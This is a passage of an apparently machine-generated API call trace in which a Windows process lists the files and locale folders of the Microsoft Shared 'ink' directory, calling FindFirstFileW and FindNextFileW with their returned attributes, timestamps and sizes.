ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0208.134] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0208.134] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0208.134] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42a795bf, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x42a795bf, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43f1e320, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x29800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0208.134] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0208.134] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a593198, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6a593198, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf44c0670, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0208.135] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0208.135] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0208.135] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0208.135] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0208.135] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ef1310, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x56ef1310, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x449d3e50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0208.135] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bf05363, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bf05363, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bf05363, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tabskb.dll", cAlternateFileName="")) returned 1 [0208.135] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45c03bb8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x45c03bb8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf8825d20, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0208.136] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th-TH", cAlternateFileName="")) returned 1 [0208.136] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41bbeec8, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x41bbeec8, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44c363f0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipBand.dll", cAlternateFileName="")) returned 1 [0208.136] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6a2945, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5d6a2945, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0208.136] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7038f2, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x3d7038f2, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x18975da0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0208.136] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa125f634, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa125f634, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa1285794, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x130600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipskins.dll", cAlternateFileName="")) returned 1 [0208.136] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1213373, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa1213373, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa12394d3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7ae00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0208.136] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3dda83b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3dda83b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3dda83b, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tpcps.dll", cAlternateFileName="")) returned 1 [0208.136] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0208.136] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0208.137] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0208.137] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0208.137] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0208.137] FindClose (in: hFindFile=0xb7f590 | out: hFindFile=0xb7f590) returned 1 [0208.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee5c) returned 1 [0208.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee68) returned 1 [0208.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee9c) returned 1 [0208.137] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", nBufferLength=0x105, lpBuffer=0x6d8e9a4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", lpFilePart=0x0) returned 0x32 [0208.137] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", nBufferLength=0x105, lpBuffer=0x6d8e978, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpFilePart=0x0) returned 0x33 [0208.138] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x6d8ebc4 | out: lpFindFileData=0x6d8ebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f590 [0208.138] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.138] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0208.138] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0208.138] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0208.138] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0208.139] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c92176b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c92176b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xdd6ec0f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConvertInkStore.exe", cAlternateFileName="")) returned 1 [0208.139] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0208.139] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0208.139] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0208.139] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0208.139] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0208.139] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0208.139] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0208.139] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0208.140] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0208.140] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c53a9c4, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5c53a9c4, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xe29c9700, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xe2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickLearningWizard.exe", cAlternateFileName="")) returned 1 [0208.140] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0208.140] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0208.140] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0208.140] FindNextFileW (in: hFindFile=0xb7f590, lpFindFileData=0x6d8ebd4 | out: lpFindFileData=0x6d8ebd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 